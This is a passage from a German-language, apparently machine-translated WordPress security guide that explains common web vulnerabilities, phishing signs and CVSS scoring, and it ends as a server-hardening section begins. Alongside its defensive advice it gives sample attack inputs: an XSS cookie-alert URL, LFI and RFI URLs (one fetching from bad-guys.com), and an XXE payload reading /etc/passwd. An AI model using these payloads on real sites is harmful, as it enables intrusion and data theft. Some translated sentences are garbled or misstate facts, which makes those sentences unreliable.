 http://yourfavesite.com/account?name=<script>alert(document.cookie)</script>

Wenn der neue Benutzer auf den Link klickt, sendet sein Browser eine Anfrage für:

 /account?name=<script>alert(document.cookie)</script>

zu bad-guys.com . Die Website antwortet mit der Seite, die den obigen Javascript-Code enthält.

Der Browser des neuen Benutzers erstellt ein DOM-Objekt für die Seite, in dem das document.location Objekt die Zeichenfolge enthält:

 http://www.bad-guys.com/account?name=<script>alert(document.cookie)</script>

Der ursprüngliche Code auf der Seite erwartet nicht, dass der Standardparameter HTML-Markup enthält und das Markup auf der Seite widerspiegelt. Dann rendert der Browser des neuen Benutzers die Seite und führt das Skript des Angreifers aus:

 alert(document.cookie)

So verhindern Sie DOM-basiertes Cross-Site-Scripting

Regel Nr. 1 auf dem OWASP Dom-basierten Spickzettel zur Verhinderung von Cross-Site-Scripting ist HTML-Escape. Dann JS-Escape, bevor nicht vertrauenswürdige Daten zum HTML-Unterkontext innerhalb des Ausführungskontexts hinzugefügt werden.

Beispiele für gefährliche HTML-Methoden:

Attribute

 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<HTML> Tags and markup";

Methoden

 document.write("<HTML> Tags and markup"); document.writeln("<HTML> Tags and markup");

Um dynamische HTML-Updates im DOM-Safe durchzuführen, empfiehlt OWASP:

1. HTML-Codierung und dann
2. JavaScript-Codierung aller nicht vertrauenswürdigen Eingaben, wie in diesen Beispielen gezeigt:

 element.innerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"; element.outerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>";

 document.write("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"); document.writeln("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>");

8. Sicherheitslücke durch Cross-Site Request Forgery

Eine CSRF- oder Cross-Site-Request-Forgery-Sicherheitslücke tritt auf, wenn ein Cyberkrimineller einen Benutzer dazu bringt, unbeabsichtigte Aktionen auszuführen. Der Angreifer fälscht die Anfrage des Benutzers an eine Anwendung.

Beispiel für eine Cross-Site Request Forgery

In unserem WordPress Vulnerability Roundup vom Januar 2020 haben wir über die Cross-Site Request Forgery-Schwachstelle berichtet, die im Code Snippets-Plugin gefunden wurde. (Das Plugin wurde in Version 2.14.0 schnell gepatcht)

Der fehlende CRSF-Schutz des Plugins ermöglichte es jedem, eine Anfrage im Namen eines Administrators zu fälschen und ausführbaren Code auf einer anfälligen Site einzuschleusen. Ein Angreifer hätte diese Sicherheitsanfälligkeit ausnutzen können, um Schadcode auszuführen und sogar eine vollständige Site-Übernahme durchzuführen.

So verhindern Sie die Fälschung von Cross-Site-Anfragen

Die meisten Codierungs-Frameworks verfügen über integrierte Abwehrmechanismen für synchronisierte Token zum Schutz vor CSRF, und diese sollten verwendet werden.

Es gibt auch externe Komponenten wie das CSRF Protector Project, die verwendet werden können, um PHP- und Apache CSRF-Schwachstellen zu schützen.

9. Sicherheitslücke durch serverseitige Anforderungsfälschung

Eine SSRF- oder Server-Site-Request-Forger-Schwachstelle ermöglicht es einem Angreifer, eine serverseitige Anwendung dazu zu bringen, HTTP-Anfragen an eine beliebige Domäne seiner Wahl zu senden.

Beispiel für serverseitige Anforderungsfälschung

Eine SSRF-Schwachstelle könnte ausgenutzt werden, um einen Reflected Cross-Site Scripting-Angriff durchzuführen. Ein Angreifer könnte ein bösartiges Skript von bad-guys.com abrufen und es allen Besuchern einer Website bereitstellen.

So verhindern Sie die serverseitige Anforderungsfälschung

Der erste Schritt zur Minderung von SSRF-Schwachstellen besteht darin, Eingaben zu validieren. Wenn Ihr Server beispielsweise auf vom Benutzer bereitgestellte URLs angewiesen ist, um verschiedene Dateien abzurufen, sollten Sie die URL validieren und nur Zielhosts zulassen, denen Sie vertrauen.

Weitere Informationen zur SSRF-Prävention finden Sie im OWASP-Spickzettel.

10. Sicherheitslücke durch Rechteeskalation

Eine Sicherheitsanfälligkeit bezüglich der Rechteausweitung ermöglicht es einem Angreifer, Aufgaben auszuführen, die normalerweise höhere Berechtigungen erfordern.

Beispiel für eine Berechtigungseskalation

In unserem WordPress Vulnerability Roundup vom November 2020 haben wir über eine Sicherheitslücke bei der Eskalation von Berechtigungen im Ultimate Member-Plugin berichtet (Die Sicherheitslücke wurde in Version 2.1.12 gepatcht).

Ein Angreifer könnte einen Array-Parameter für das Benutzer-Meta wp_capabilities der die Rolle eines Benutzers definiert. Während des Registrierungsprozesses wurden die übermittelten Registrierungsdetails an die Funktion update_profile , und alle entsprechenden Metadaten, die übermittelt wurden, unabhängig davon, was übermittelt wurde, wurden für diesen neu registrierten Benutzer aktualisiert.

Die Schwachstelle ermöglichte es einem neuen Benutzer im Wesentlichen, bei der Registrierung einen Administrator anzufordern.

So verhindern Sie die Eskalation von Berechtigungen

iThemes Security Pro kann Ihre Website vor defekter Zugriffskontrolle schützen, indem der Administratorzugriff auf eine Liste vertrauenswürdiger Geräte beschränkt wird.

11. Sicherheitsanfälligkeit bezüglich Remotecodeausführung

Eine RCE- oder Remote Code Execution-Schwachstelle ermöglicht es einem Angreifer, auf einen Computer oder Server zuzugreifen, Änderungen daran vorzunehmen und sogar zu übernehmen.

Beispiel für Remote-Codeausführung

Im Jahr 2018 hat Microsoft eine in Excel gefundene Sicherheitsanfälligkeit bezüglich Remotecodeausführung offengelegt.

Ein Angreifer, der die Sicherheitsanfälligkeit erfolgreich ausnutzt, kann im Kontext des aktuellen Benutzers beliebigen Code ausführen. Wenn der aktuelle Benutzer mit administrativen Benutzerrechten angemeldet ist, könnte ein Angreifer die Kontrolle über das betroffene System übernehmen. Ein Angreifer könnte dann Programme installieren; Daten anzeigen, ändern oder löschen; oder erstellen Sie neue Konten mit vollen Benutzerrechten. Benutzer, deren Konten mit weniger Benutzerrechten auf dem System konfiguriert sind, könnten weniger betroffen sein als Benutzer, die mit administrativen Benutzerrechten arbeiten.

So verhindern Sie die Remotecodeausführung

Der einfachste Weg, eine RCE-Sicherheitslücke zu mindern, besteht darin, Benutzereingaben durch Filtern und Entfernen unerwünschter Zeichen zu validieren.

Unsere Muttergesellschaft Liquid Web hat einen großartigen Artikel über das Verhindern der Remotecodeausführung.

14. Sicherheitslücke beim Einbinden von Dateien

Eine Sicherheitsanfälligkeit bezüglich Dateieinschluss tritt auf, wenn eine Webanwendung dem Benutzer ermöglicht, Eingaben in Dateien zu senden oder Dateien auf den Server hochzuladen.

Es gibt zwei Arten von Sicherheitslücken beim Einschließen von Dateien: Lokal und Remote.

15. Schwachstelle beim Einschließen lokaler Dateien

Eine LFI- oder Local File Inclusion-Schwachstelle ermöglicht es einem Angreifer, Dateien auf dem Server einer Website zu lesen und manchmal auszuführen.

Beispiel zum Einschließen einer lokalen Datei

yourfavesite.com wir noch einen Blick auf yourfavesite.com , wo Pfade, die an include Anweisungen übergeben werden, nicht ordnungsgemäß bereinigt werden. Sehen wir uns zum Beispiel die folgende URL an.

 yourfavesite.com/module.php?file=example.file

Ein Angreifer kann den URL-Parameter ändern, um auf eine beliebige Datei auf dem Server zuzugreifen.

 yourfavesite.com/module.php?file=etc/passwd

Wenn Sie den Wert der Datei in der URL ändern, kann ein Angreifer den Inhalt der psswd-Datei anzeigen.

So verhindern Sie die Einbeziehung lokaler Dateien

Erstellen Sie eine Liste der zulässigen Dateien, die die Seite enthalten kann, und verwenden Sie dann eine Kennung, um auf die ausgewählte Datei zuzugreifen. Blockieren Sie dann alle Anfragen, die eine ungültige Kennung enthalten.

16. Sicherheitsanfälligkeit bezüglich Remote-Dateieinschluss

Eine RFI- oder Remote File Inclusion-Schwachstelle ermöglicht es einem Angreifer, eine Datei einzubinden, wobei er normalerweise einen in der Zielanwendung implementierten „dynamischen Dateieinschluss“-Mechanismus ausnutzt.

Beispiel für die Einbindung von Remote-Dateien

Das WordPress-Plugin WP mit Spritz wurde im WordPress.org-Repository geschlossen, da es eine RFI-Schwachstelle aufwies.

Unten ist der Quellcode der Schwachstelle:

 if(isset($_GET['url'])){ $content=file_get_contents($_GET['url']);

Der Code kann ausgenutzt werden, indem der Wert von content.filter.php?url= wird. Zum Beispiel:

 yoursite.com//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://bad-guys.com/exec

Verhinderung des Einschlusses von Remote-Dateien

Erstellen Sie eine Liste der zulässigen Dateien, die die Seite enthalten kann, und verwenden Sie dann eine Kennung, um auf die ausgewählte Datei zuzugreifen. Blockieren Sie dann alle Anfragen, die eine ungültige Kennung enthalten.

17. Directory Traversal-Schwachstelle

Eine Directory Traversal- oder File Traversal-Schwachstelle ermöglicht es einem Angreifer, beliebige Dateien auf dem Server zu lesen, auf dem eine Anwendung ausgeführt wird.

Beispiel für eine Verzeichnisdurchquerung

Die WordPress-Versionen 5.7 – 5.03 waren anfällig für Directory-Traversal-Angriffe, da sie die Benutzereingabedaten nicht ordnungsgemäß überprüfen konnten. Ein Angreifer mit Zugriff auf ein Konto mit mindestens author könnte die Directory-Traversal-Schwachstelle ausnutzen und bösartigen PHP-Code auf dem zugrunde liegenden Server ausführen, was zu einer vollständigen Remote-Übernahme führt.

So verhindern Sie das Durchsuchen von Verzeichnissen

Entwickler können beim Erstellen von Vorlagen oder bei der Verwendung von Sprachdateien Indizes anstelle von tatsächlichen Teilen von Dateinamen verwenden.

18. Sicherheitslücke durch böswillige Weiterleitung

Eine Sicherheitsanfälligkeit durch böswillige Umleitung ermöglicht es einem Angreifer, Code einzuschleusen, um Website-Besucher auf eine andere Website umzuleiten.

Beispiel für eine bösartige Weiterleitung

Nehmen wir an, Sie suchen über die Suchfunktion einer Online-Boutique nach einem blauen Pullover.

Leider kann der Server der Boutique die Benutzereingaben nicht richtig codieren, und ein Angreifer konnte ein bösartiges Umleitungsskript in Ihre Suchanfrage einschleusen.

Wenn Sie also blauen Pullover in das Suchfeld der Boutique eingeben und die Eingabetaste drücken, landen Sie auf der Webseite des Angreifers anstelle der Seite der Boutique mit Pullovern, die der Beschreibung Ihrer Suche entsprechen.

So verhindern Sie böswillige Weiterleitungen

Sie können sich vor böswilligen Weiterleitungen schützen, indem Sie Benutzereingaben bereinigen, URLs validieren und eine Besucherbestätigung für alle Offsite-Weiterleitungen erhalten.

19. XML-Sicherheitslücke in externen Entitäten

Eine XXE- oder XML External Entity-Schwachstelle ermöglicht es einem Angreifer, einen XML-Parser dazu zu bringen, vertrauliche Informationen an eine externe Entität unter seiner Kontrolle weiterzugeben .

Beispiel für eine externe XML-Entität

Ein Angreifer könnte eine XXE-Sicherheitslücke ausnutzen, um Zugriff auf sensible Dateien wie etc/passwd zu erhalten, die Benutzerkontoinformationen speichert.

 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

So verhindern Sie eine externe XML-Entität

Der beste Weg, um XXE zu verhindern, besteht darin, weniger komplexe Datenformate wie JSON zu verwenden und die Serialisierung sensibler Daten zu vermeiden.

20. Denial-of-Service-Angriff

Ein DoS- oder Denial-of-Service-Angriff ist ein bewusster Versuch, Ihre Website oder Anwendung für Benutzer nicht verfügbar zu machen, indem sie mit Netzwerkverkehr überflutet wird.

Bei einem DDoS- Distributed-Denial-of-Service-Angriff nutzt ein Angreifer mehrere Quellen, um ein Netzwerk mit Datenverkehr zu fluten. Ein Angreifer entführt Gruppen von Malware-infizierten Computern, Routern und IoT-Geräten, um den Verkehrsfluss zu erhöhen.

Beispiel für einen Denial-of-Service-Angriff

Der bisher größte DDoS-Angriff (Distributed Denial-of-Service) wurde im Februar dieses Jahres gegen AWS erhoben. Amazon berichtete, dass AWS Shield, ihr Managed Threat Protection Service, diesen riesigen DDoS-Angriff beobachtet und abgeschwächt hat. Der Angriff dauerte 3 Tage und erreichte einen Spitzenwert von 2,3 Terabyte pro Sekunde.

So verhindern Sie Denial-of-Service-Angriffe

Es gibt zwei Hauptmethoden, um einen DoS-Angriff abzuwehren.

1. Kaufen Sie mehr Hosting, als Sie benötigen. Wenn Sie zusätzliche Ressourcen zur Verfügung haben, können Sie die durch einen DoS-Angriff verursachte erhöhte Nachfrage bewältigen.
2. Verwenden Sie eine Firewall auf Serverebene wie Cloudflare. Eine Firewall kann ungewöhnliche Verkehrsspitzen erkennen und verhindern, dass Ihre Website überlastet wird.

21. Protokollierung von Tastenanschlägen

Keystroke Logging , auch als Keylogging oder Tastaturerfassung bekannt, tritt auf, wenn ein Hacker heimlich die Tastenanschläge von Website-Besuchern überwacht und aufzeichnet.

Beispiel für die Protokollierung von Tastenanschlägen

2017 installierte ein Hacker erfolgreich bösartiges JavaScript auf den Servern des Smartphone-Herstellers OnePlus.

Mit dem bösartigen Code überwachten und protokollierten Angreifer die Tastenanschläge von OnePlus-Kunden, während diese ihre Kreditkartendaten eingeben. Die Hacker protokollierten und sammelten die Tastenanschläge von 40.000 Kunden, bevor OnePlus den Hack entdeckte und patchte.

So verhindern Sie die Protokollierung von Tastenanschlägen

Alles aktualisieren! Normalerweise muss ein Angreifer eine andere vorhandene Sicherheitsanfälligkeit ausnutzen, um einen Keylogger auf einem Computer oder Server einzuschleusen. Wenn Sie alles mit den neuesten Sicherheitspatches auf dem neuesten Stand halten, können Sie Hackern keine einfache Möglichkeit bieten, einen Keylogger auf Ihrer Website oder Ihrem Computer zu installieren.

Bonus: Phishing

Software-Schwachstellen sind das einzige, was Hacker und Cyberkriminelle auszunutzen versuchen. Hacker zielen auch auf Menschen ab und nutzen sie aus. Eine gängige Methode der Ausbeutung ist Phishing.

Was ist Phishing?

Phishing ist eine Cyberangriffsmethode, bei der E-Mails, soziale Medien, Textnachrichten und Telefonanrufe verwendet werden, um das Opfer dazu zu bringen, persönliche Daten preiszugeben. Der Angreifer verwendet die Informationen dann, um auf persönliche Konten zuzugreifen oder Identitätsbetrug zu begehen.

So erkennen Sie eine Phishing-E-Mail

Wie wir weiter oben in diesem Beitrag erfahren haben, erfordern einige Sicherheitslücken eine Art von Benutzerinteraktion, um sie auszunutzen. Eine Möglichkeit, wie ein Hacker Menschen dazu bringt, sich an ihren schändlichen Unternehmungen zu beteiligen, besteht darin, Phishing-E-Mails zu versenden.

Zu lernen, wie man eine Phishing-E-Mail erkennt, kann Sie davor bewahren, versehentlich in die Pläne von Cyberkriminellen einzudringen.

4 Tipps, um eine Phishing-E-Mail zu erkennen :

1. Schauen Sie sich die Absender-E- Mail-Adresse an – Wenn Sie eine E-Mail von einem Unternehmen erhalten, sollte der Teil der E-Mail-Adresse des Absenders nach dem „@“ mit dem Firmennamen übereinstimmen.
   
   Wenn eine E-Mail ein Unternehmen oder eine Regierungsbehörde darstellt, aber eine öffentliche E-Mail-Adresse wie "@gmail" verwendet, ist dies ein Zeichen für eine Phishing-E-Mail.
   
   Achten Sie auf subtile Rechtschreibfehler des Domainnamens. Schauen wir uns zum Beispiel diese E-Mail-Adresse an [email protected] Wir können sehen, dass Netflix am Ende ein zusätzliches „x“ hat. Der Rechtschreibfehler ist ein klares Zeichen dafür, dass die E-Mail von einem Betrüger gesendet wurde und sofort gelöscht werden sollte.
   
2. Suchen Sie nach Grammatikfehlern – Eine E-Mail voller Grammatikfehler ist ein Zeichen für eine bösartige E-Mail. Alle Wörter sind möglicherweise richtig geschrieben, aber Sätzen fehlen Wörter, die den Satz zusammenhängend machen würden. Beispiel: „Ihr Konto wurde gehackt. Passwort auf Kontosicherheit aktualisieren“.
   
   Jeder macht Fehler und nicht jede E-Mail mit einem oder zwei Tippfehlern ist ein Versuch, Sie zu betrügen. Mehrere grammatikalische Fehler rechtfertigen jedoch einen genaueren Blick, bevor Sie reagieren.
   
3. Verdächtige Anhänge oder Links – Es lohnt sich, einen Moment innezuhalten, bevor Sie mit Anhängen oder Links in einer E-Mail interagieren.
   
   Wenn Sie den Absender einer E-Mail nicht kennen, sollten Sie keine in der E-Mail enthaltenen Anhänge herunterladen, da diese Malware enthalten und Ihren Computer infizieren könnten. Wenn die E-Mail behauptet, von einem Unternehmen zu stammen, können Sie deren Kontaktinformationen bei Google überprüfen, um zu überprüfen, ob die E-Mail von ihnen gesendet wurde, bevor Sie Anhänge öffnen.
   
   Wenn eine E-Mail einen Link enthält, können Sie mit der Maus über den Link fahren, um zu überprüfen, ob die URL Sie dorthin führt, wo sie sein sollte.
   
4. Achten Sie auf dringende Anfragen – Ein gängiger Trick von Betrügern besteht darin, ein Gefühl der Dringlichkeit zu erzeugen. Eine bösartige E-Mail kann ein Szenario erzeugen, das sofortige Maßnahmen erfordert. Je mehr Zeit Sie zum Nachdenken haben, desto größer ist die Chance, dass Sie erkennen, dass die Anfrage von einem Betrüger stammt.
   
   Möglicherweise erhalten Sie eine E-Mail von Ihrem „Chef“, in der Sie aufgefordert werden, so schnell wie möglich an einen Anbieter zu zahlen, oder von Ihrer Bank, die Sie darüber informiert, dass Ihr Konto gehackt wurde und sofortige Maßnahmen erforderlich sind.

So messen Sie den Schweregrad einer WordPress-Sicherheitslücke

Es gibt verschiedene Arten von WordPress-Schwachstellen, die alle unterschiedlich risikobehaftet sind. Zum Glück für uns verfügt die National Vulnerability Database – ein Projekt des National Institute of Science and Technology – über einen Rechner zur Bewertung von Schwachstellen, um das Risiko einer Schwachstelle zu bestimmen.

In diesem Abschnitt des WordPress-Schwachstellenleitfadens werden die Metriken und Schweregrade des Schwachstellenbewertungssystems behandelt. Obwohl dieser Abschnitt etwas technischer ist, können einige Benutzer ihn nützlich finden, um ihr Verständnis dafür zu vertiefen, wie WordPress-Schwachstellen und deren Schweregrad bewertet werden.

Häufige Systemkennzahlen für WordPress-Sicherheitslücken

Die Gleichung des Schwachstellenbewertungssystems verwendet drei verschiedene Bewertungssätze, um die Gesamtbewertung des Schweregrads zu bestimmen.

1. Basiskennzahlen

Die Basismetrikgruppe stellt die Merkmale einer Schwachstelle dar, die in allen Benutzerumgebungen konstant sind.

Die Basismetriken sind in zwei Gruppen unterteilt, Ausnutzbarkeit und Auswirkung.

1.1. Ausnutzbarkeitsmetriken

Die Ausnutzbarkeitsbewertung basiert darauf, wie schwierig es für einen Angreifer ist, die Sicherheitsanfälligkeit auszunutzen. Die Punktzahl wird anhand von 5 verschiedenen Variablen berechnet.

1.1.1. Angriffsvektor (AV)

Der Angriffsvektor-Score basiert auf der Methode, mit der die Schwachstelle ausgenutzt wird. Die Punktzahl ist umso höher, je weiter entfernt ein Angreifer die Sicherheitsanfälligkeit ausnutzen kann.

Die Idee ist, dass die Anzahl potenzieller Angreifer viel größer ist, wenn die Sicherheitsanfälligkeit über ein Netzwerk ausgenutzt werden kann, verglichen mit einer Sicherheitsanfälligkeit, die einen physischen Zugriff auf einen Geräte-Exploit erfordert.

Je mehr potenzielle Angreifer es gibt, desto höher ist das Risiko einer Ausnutzung, und daher wird der Angriffsvektorwert der Sicherheitsanfälligkeit höher ausfallen.

1.1.2. Angriffskomplexität (AC)

Der Komplexitätswert basiert auf den Bedingungen, die zum Ausnutzen der Schwachstelle erforderlich sind. Einige Bedingungen erfordern möglicherweise das Sammeln weiterer Informationen über das Ziel, das Vorhandensein bestimmter Systemkonfigurationseinstellungen oder rechnerische Ausnahmen.

Die Punktzahl der Angriffskomplexität ist umso höher, je geringer die Komplexität ist, die zum Ausnutzen der Sicherheitsanfälligkeit erforderlich ist.

1.1.3. Erforderliche Berechtigungen (PR)

Die Bewertung der erforderlichen Berechtigungen wird basierend auf den Berechtigungen berechnet, die ein Angreifer erlangen muss, bevor er eine Sicherheitsanfälligkeit ausnutzt. Wir werden im Abschnitt Authentifiziert vs. Nicht authentifiziert etwas mehr darauf eingehen.

Die Punktzahl ist am höchsten, wenn keine Berechtigungen erforderlich sind.

1.1.4. Benutzerinteraktion (UI)

Die Benutzerinteraktionsbewertung wird basierend darauf bestimmt, ob eine Schwachstelle eine Benutzerinteraktion erfordert, um sie auszunutzen.

Die Punktzahl ist am höchsten, wenn keine Benutzerinteraktion erforderlich ist, damit ein Angreifer die Sicherheitsanfälligkeit ausnutzt.

1.1.5. Umfang

Die Bereichsbewertung basiert auf einer Schwachstelle in einer Softwarekomponente, die sich auf Ressourcen außerhalb ihres Sicherheitsbereichs auswirkt.

Der Sicherheitsumfang umfasst andere Komponenten, die ausschließlich dieser Komponente Funktionalität zur Verfügung stellen, selbst wenn diese anderen Komponenten über ihre eigene Sicherheitsautorität verfügen.

Die Punktzahl ist am höchsten, wenn eine Bereichsänderung auftritt.

1.2. Auswirkungsmetriken

Die Impact-Metriken erfassen die direkten Auswirkungen einer erfolgreich ausgenutzten Schwachstelle.

1.2.1. Vertraulicher Einfluss (C)

Diese vertrauliche Auswirkungsbewertung misst die Auswirkung auf die Vertraulichkeit der Informationen, die von ausgenutzter Software verwaltet werden.

Die Punktzahl ist am höchsten, wenn der Verlust für die betroffene Software am höchsten ist.

1.2.2. Integrität (I)

Diese Integritätsbewertung basiert auf den Auswirkungen auf die Integrität einer erfolgreich ausgenutzten Sicherheitsanfälligkeit.

Die Punktzahl ist am höchsten, wenn die Folgen der betroffenen Software am größten sind.

1.2.3. Verfügbarkeit (A)

Die Verfügbarkeitsbewertung basiert auf den Auswirkungen der Verfügbarkeit der ausgenutzten Software.

Der Score ist am höchsten, wenn die Auswirkung der betroffenen Komponente am größten ist.

Basisbewertung CVSS-Bewertungsberechnung

Die Basisbewertung ist eine Funktion der Unterbewertungsgleichungen Auswirkung und Ausnutzbarkeit. Wo der Basiswert definiert ist als:

 If (Impact sub score <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02] 15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

2. Temporale Score-Metriken

Die Temporal-Metriken messen den aktuellen Stand von Exploit-Techniken, das Vorhandensein von Patches oder Workarounds oder das Vertrauen, das man in die Beschreibung einer Schwachstelle hat.

Es wird erwartet, dass sich zeitliche Metriken im Laufe der Zeit ändern.

2.1. Laufzeit des Exploit-Codes (E)

Die Reife des Exploit-Codes basiert auf der Wahrscheinlichkeit, dass die Schwachstelle angegriffen wird.

Je einfacher eine Schwachstelle ausgenutzt werden kann, desto höher ist der Schwachstellen-Score.

2.2. Sanierungsstufe (RL)

Der Behebungsgrad einer Schwachstelle ist ein wichtiger Faktor für die Priorisierung. Problemumgehungen oder Hotfixes können eine vorübergehende Abhilfe bieten, bis ein offizieller Patch oder ein offizielles Upgrade veröffentlicht wird.

Je weniger offiziell und dauerhaft ein Fix ist, desto höher ist der Schwachstellen-Score.

2.3. Vertrauen melden (RC)

Die Metrik „Report Confidence“ misst das Vertrauen, dass eine Schwachstelle besteht, und die Glaubwürdigkeit der technischen Details.

Je mehr eine Schwachstelle vom Anbieter oder anderen seriösen Quellen validiert wird, desto höher ist die Punktzahl.

Temporale CVSS-Score-Berechnung

Der Zeitwert ist definiert als:

 Roundup(BaseScore v× ExploitCode Maturity × RemediationLevel × ReportConfidence)

3. Kennzahlen zur Umweltbewertung

Die Umgebungsmetriken ermöglichen es Analysten, die CVSS-Bewertung basierend auf der Bedeutung der betroffenen IT-Assets anzupassen.

Die Metriken zur Umweltausnutzung und -auswirkung sind ein modifiziertes Äquivalent der Basismetriken und werden basierend auf der Komponentenplatzierung der organisatorischen Infrastruktur zugewiesen. In den obigen Abschnitten zu Basismetriken finden Sie die Werte und Beschreibungen der Ausnutzbarkeits- und Auswirkungsmetriken.

Die Umgebungsmetriken enthalten eine zusätzliche Gruppe, Impact Subscore Modifiers.

3.1. Metriken für Auswirkungs-Teilbewertungsmodifikatoren

Die Impact Subscore Modifiers-Metriken bewerten die spezifischen Sicherheitsanforderungen für Vertraulichkeit (CR), Integrität (IR) und Verfügbarkeit (AR) und ermöglichen eine Feinabstimmung der Umgebungsbewertung entsprechend der Umgebung des Benutzers.

Berechnung des Umwelt-CVSS-Scores

Die Umweltbewertung ist definiert als:

 If (Modified Impact Sub score <= 0) 0 else, If Modified Scope is Unchanged Round up(Round up (Minimum [ (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) If Modified Scope is Changed Round up(Round up (Minimum [1.08 × (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) And the modified Impact sub score is defined as, If Modified Scope is Unchanged 6.42 × [ISC Modified ] If Modified Scope is Changed 7.52 × [ISC Modified - 0.029]-3.25× [ISC Modified × 0.9731 - 0.02] 13 Where, ISC Modified = Minimum [[1 - (1 - M.IConf × CR) × (1 - M.IInteg × IR) × (1 - M.IAvail × AR)], 0.915] The Modified Exploitability sub score is, 8.22 × M.AttackVector × M.AttackComplexity × M.PrivilegeRequired × M.UserInteraction 4 Where “Round up” is defined as the smallest number, specified to one decimal place, that is equal to or higher than its input. For example, Round up (4.02) is 4.1; and Round up (4.00) is 4.0.

CVSS-Gesamtbewertung und Schweregrad

Der Overall Common Vulnerability Scoring System oder CVSS-Score ist eine Darstellung der Basis-, Zeit- und Umgebungsbewertungen.

Der CVSS-Gesamtwert kann verwendet werden, um Ihnen eine Vorstellung davon zu geben, wie schwer oder schwerwiegend eine Schwachstelle ist.

Beispiel für eine echte CVSS-Schweregradbewertung

In unserem Vulnerability Roundup vom Dezember 2020 haben wir über eine Schwachstelle im Easy WP SMTP-Plugin berichtet. Die Zero-Day-Schwachstelle (wir werden Zero-Day-Schwachstellen im nächsten Abschnitt behandeln) ermöglichte es einem Angreifer, die Kontrolle über ein Administratorkonto zu übernehmen, und wurde in freier Wildbahn ausgenutzt.

Wenn wir uns den Eintrag in der National Vulnerability Database ansehen, können wir den Schweregrad der WP SMTP-Sicherheitslücke ermitteln.

Lassen Sie uns ein paar Dinge aus dem obigen Screenshot von WP SMTP NVDB aufschlüsseln.

Base Score: Basisbewertung ist 7.5, die uns sagt , dass die Bewertung des Schweregrads für die Verwundbarkeit hoch ist.

Vektor : Der Vektor sagt uns, dass der Score auf den CVSS 3.1-Schwachstellengleichungen und den Metriken zur Berechnung des Scores basiert.

Hier ist der Metrikteil des Vektors.

 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Lassen Sie uns nun die Basismetrikwerte und Beschreibungen von oben in diesem Beitrag verwenden, um die acht Metrikwerte des Vektors zu verstehen.

1. AV:N – Dies bedeutet, dass der Angriffsvektor (AV) der Schwachstelle das Netzwerk (N) ist. Mit anderen Worten, ein Angreifer benötigt nur Netzwerkzugriff, um die Sicherheitsanfälligkeit auszunutzen.
2. AC:L – Die Angriffskomplexität (AC) der Schwachstelle ist niedrig (L). Mit anderen Worten, jeder Script-Kiddie kann die Schwachstelle ausnutzen.
3. PR:N – Die erforderlichen Berechtigungen (PR) zum Ausnutzen der Sicherheitsanfälligkeit sind Keine (N). Die Sicherheitsanfälligkeit erfordert also keinen authentifizierten Benutzer, um ihn auszunutzen. (Wir werden den Unterschied zwischen authentifizierten und nicht authentifizierten Sicherheitslücken später in diesem Beitrag behandeln.)
4. UI:N – Die zum Ausnutzen dieser Sicherheitsanfälligkeit erforderliche Benutzerinteraktion (UI) ist Keine (N). Der Angreifer hat also die Möglichkeit, die Schwachstelle selbst auszunutzen.
5. S:U – Dies bedeutet, dass der Umfang (S) der Schwachstelle Unverändert (U) ist. Bei dieser Sicherheitsanfälligkeit sind die anfällige Komponente und die betroffene Komponente identisch.
6. C:H – Die Vertraulichkeitswirkung (C) der Schwachstelle ist hoch (H). Wenn diese Sicherheitsanfälligkeit ausgenutzt wird, führt dies zu einem vollständigen Verlust der Vertraulichkeit.
7. I:N – Die Integritätsauswirkung (I) dieser Sicherheitsanfälligkeit ist Keine (N). Wenn die Schwachstelle ausgenutzt wird, gibt es keinen Verlust der Integrität oder Vertrauenswürdigkeit der anfälligen Informationen.
8. A:N – Dies bedeutet, dass die Auswirkung auf die Verfügbarkeit (A) „Keine“ (N) ist. Wenn die Schwachstelle ausgenutzt wird, hat dies keine Auswirkungen auf die Verfügbarkeit Ihrer Website.

Der CVSS-Score kann uns helfen, den Schweregrad und den Umfang einer bestimmten Schwachstelle zu bestimmen. In den nächsten Abschnitten werden wir einige wichtige Begriffe zu Schwachstellen behandeln, die häufig in Offenlegungen von Schwachstellen enthalten sind.

Einpacken

In diesem Abschnitt haben wir einige wichtige Elemente der WordPress-Sicherheit kennengelernt, darunter die Motivation von Hackern, die verschiedenen Arten von Hacks, die Schwachstellen, die Online-Kriminelle ausnutzen, wie Sie das Risiko von Schwachstellen minimieren und das Risiko bestimmen, das eine Schwachstelle für Sie darstellt Webseite.

Wenn wir verstehen, wie Angreifer versuchen, unsere Websites zu hacken, und ihr Ziel, nachdem sie unsere Websites verletzt haben, können wir die richtigen Abwehrmaßnahmen aufbauen.

In den nächsten Abschnitten erfahren Sie, wie Sie Ihre Website vor nahezu allen Angriffen eines Hackers schützen können.

Abschnitt 4: Sichern Ihres Servers

Der erste Schritt in Ihrer WordPress-Sicherheitsstrategie besteht darin, Ihren Server zu sichern. Ihr Server speichert alle Dateien und Codes, die Ihre Website zum Laufen bringen.

In diesem Abschnitt erfahren Sie:

1. Die Bedeutung der Wahl eines guten Gastgebers.
2. So verschlüsseln Sie die Kommunikation auf Ihrer Website.
3. Wie eine Firewall zum Schutz Ihrer Site beitragen kann.

Wählen Sie das richtige Hosting

